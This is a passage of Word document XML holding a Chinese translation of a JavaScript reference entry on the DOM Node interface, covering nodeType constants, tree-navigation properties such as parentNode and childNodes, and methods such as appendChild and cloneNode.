        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Win</w:t>
      </w:r>
      <w:r>
        <w:t>dow.sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>及第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章）的脚本无法知道同时运行在其他窗口中的（同源）脚本对存储的改变。浏览器可以（虽然在写作本书时，还不是所有浏览器都可以）用类似数据库的锁机制来阻止同时更新。在支持这种机制的浏览器中，这个方法将显示地释放锁，并且可能消除其他窗口中同时运行的脚本的阻塞。调用这个方法后，检索到的存储的值可能与调用它之前的值不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="857" w:name="Node"/>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:bookmarkEnd w:id="857"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档树上的所有对象（包括</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身）都实现</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>接口，这些接口提供了遍历及操作这个树的基本属性和方法。</w:t>
      </w:r>
      <w:r>
        <w:t>pare</w:t>
      </w:r>
      <w:r>
        <w:t>ntNode</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组允许在这个文档树中上下移动。枚举给定节点的方式有两种，遍历</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>firstChild</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>nextSibling</w:t>
      </w:r>
      <w:r>
        <w:t>属性（或</w:t>
      </w:r>
      <w:r>
        <w:t>lastChild</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>previousSibling</w:t>
      </w:r>
      <w:r>
        <w:t>属性，用于反向循环）。</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>replaceChild()</w:t>
      </w:r>
      <w:r>
        <w:t>方法允许通过改变一个节点的子节点的方式修改文档树。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档树中的每个对象都同时实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>接口和一个更专业化的子接口，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Ele</w:t>
      </w:r>
      <w:r>
        <w:t>ment</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:r>
        <w:t>属性指明一个节点实现的是哪种子接口。可以在使用更专业化的接口的属性和方法之前，先用这个属性测试节点的类型。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存当前正在使用的节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n.nodeType==1){//</w:t>
      </w:r>
      <w:r>
        <w:t>也可以使用常量</w:t>
      </w:r>
      <w:r>
        <w:t>Node.ELEMENT_NODE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tagname=n.tagName;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果节点是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，这个值将是它的标签名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short ELEMENT_NODE=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short TEXT_NODE=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:t>signed short PROCESSING_INSTRUCTION_NODE=7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short COMMENT_NODE=8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOCUMENT_NODE=9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOCUMENT_TYPE_NODE=10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short DOCUMENT_FRAGMENT_NODE=11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些常量是</w:t>
      </w:r>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值。注意，它们是</w:t>
      </w:r>
      <w:r>
        <w:t>Node()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的静态属性，不是个别</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性。也要注意，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中它们</w:t>
      </w:r>
      <w:r>
        <w:t>没有定义。如果需要兼容，可以将这些值硬编码，或者定义自己的常量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOCUMENT_POSITION_DISCONNECTED=0x01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOCUMENT_POSITION_PRECEDING=0x02</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOCUMENT_POSITION_FOLLOWING=0x04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DOCUMENT_POSITION_CONTAINS=0x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">unsigned short </w:t>
      </w:r>
      <w:r>
        <w:t>DOCUMENT_POSITION_CONTAINED_BY=0x10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些常量定义</w:t>
      </w:r>
      <w:r>
        <w:t>compareDocumentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值中的位，可能为</w:t>
      </w:r>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>off</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string baseURI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性指定本</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的基准</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>将基于这个基准</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>进行解析。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的所有节点来说，这是由文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，或仅仅是移除了片断标识符的</w:t>
      </w:r>
      <w:r>
        <w:t>Document.URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly NodeList childNodes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性为一个类数组对象，包含当前节点的子节点。这个属性永远不会为</w:t>
      </w:r>
      <w:r>
        <w:t>nul l</w:t>
      </w:r>
      <w:r>
        <w:t>：对没有子节点的节点而言，</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的数组。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象是实时的：对本元素的子节点列表的任何改变都将立即在</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>中可见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Node frstChild</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前节点的第一个子节点，如果当前节点没有子节点则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Node lastChild</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前节点的最后一个子节点，如果当前节点没有子节点则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Node next</w:t>
      </w:r>
      <w:r>
        <w:t>Sibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中紧跟着当前节点的兄弟节点，如果没有对应的节点则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly string nodeName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>节点的名字。对</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点而言，值为元素的标签名，也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>接口的</w:t>
      </w:r>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:r>
        <w:t>属性得到。对大多数其他类型的节点而言，该值为一个取决于节点类型的常量字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short nodeType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>节点的类型，即，当前节点实现了哪个子接口。合法的值为上面列出的常量。由于这些常量不被</w:t>
      </w:r>
      <w:r>
        <w:t>Int</w:t>
      </w:r>
      <w:r>
        <w:t>ernet Explorer</w:t>
      </w:r>
      <w:r>
        <w:t>支持，然而，可能得用硬编码的值来替代对应的常量。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，这个属性常用的值为：</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点为</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>，以及唯一的顶级</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点为</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string nodeValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>节点的值。对</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点而言，它的值为对应的文本内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Document ownerDocument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与当前节点关联的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。对</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点而言，这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，即使一个节点还没有插入到文档中，它仍然具有</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>wner</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Node parentNode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前节点的父节点（或容器节点），如果没有父节点则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点永远没有父节点。同样地，对于已经从文档中删除的节点，或者新创建并且还没有插入到文档树中的节点，</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Node previousSibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中在当前节点前方并与当前节点相邻的兄弟节点，如果没有对应的节点则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> textContent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点而言，这个属性只是</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性的一个同义词。对</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点而言，查询这个属性将返回所有子孙</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点拼接的文本内容。设置</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>的这个属性将替换该元素或碎片的所有子孙节点为单个内容为指定值的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node appendChild(Node newChild)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将节点</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>添加到文档中，将它作为当前节点的最后一个子节点插入。如果</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>已经在文档树中，它将先从文</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>档树中移除，再插入到新的位置。如果</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>（文档碎片）节点，它将不会插入它本身，而是将它的子节点按顺序追加到当前节点的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组后面。注意，来自（或创建于）一个文档的节点不能插入到另一个文档中。这就是说，</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>ownerDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性必须与当前节点的</w:t>
      </w:r>
      <w:r>
        <w:t>ownerDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性一致。（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Docum</w:t>
      </w:r>
      <w:r>
        <w:t>ent.adoptNode()</w:t>
      </w:r>
      <w:r>
        <w:t>）。这个方法返回传入的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node cloneNode(boolean deep)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在节点上调用</w:t>
      </w:r>
      <w:r>
        <w:t>cloneNode()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将返回这个节点的一份副本。如果传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，这个节点的子孙节点也将递归地复制。否则，它只复制这个节点而忽略它的子节点。返回的节点不是文档树的一部分，它们的</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。当复制一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
